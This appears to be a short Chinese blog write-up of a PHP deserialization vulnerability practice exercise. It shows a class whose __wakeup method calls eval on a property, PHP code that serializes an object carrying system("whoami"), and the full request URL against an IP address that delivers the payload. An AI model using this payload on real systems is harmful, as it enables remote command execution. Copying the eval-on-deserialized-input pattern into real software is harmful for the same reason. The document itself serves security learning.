当前位置: 首页 > news >正文

反序列化漏洞练习1

根据代码可以看出来sis类只是接收了参数cmd,下边是通过get获得cmd的值,所以可以在序列化过程中直接为cmd赋值。

根据源码编写序列化代码

<?php
class sis{public $cmd='system("whoami");?>';public function __wakeup(){eval($this->cmd);}
}
$a = new sis;
echo serialize($a);
?>

为cmd赋值后,直接将整个sis类序列化

访问该代码 

得到序列化的sis,将序列化后的sis以get的方式为cmd传参

124.221.58.83:81/s1.php?cmd=O:3:"sis":1:{s:3:"cmd";s:19:"system("whoami");?>";}

 完成


http://www.mrgr.cn/news/23195.html

相关文章:

  • 20章 线性表、栈、队列和优先队列
  • 前端面试热点题目——typescript篇
  • 苍穹外卖()
  • 【数据结构与算法 | 灵神题单 | 删除链表篇】力扣2487, 237
  • LeetCode之字典树
  • 输入子系统
  • Qt常用控件——QRadioButton和QCheckBox
  • 数据结构—单链表的基本操作
  • C++之数据类型
  • 【人工智能】详细介绍如何在本地部署一个类似于GPT的大语言模型
  • 华为 HCIP-Datacom H12-821 题库 (6)
  • 【代码随想录训练营第42期 Day55打卡 - 图论Part5 - 并查集的应用
  • 证件照背景替换软件有哪些?证照之星怎么换背景色
  • CTK框架(七):事件监听
  • day45
  • SAP与泛微OA系统集成案例(制药行业)
  • 使用transform对html的video播放器窗口放大
  • 多路转接之poll(接口介绍,struct pollfd介绍,实现原理,实现非阻塞网络通信代码)
  • 八、3 DMA数据转运(代码)
  • Linux内核的调试(TODO)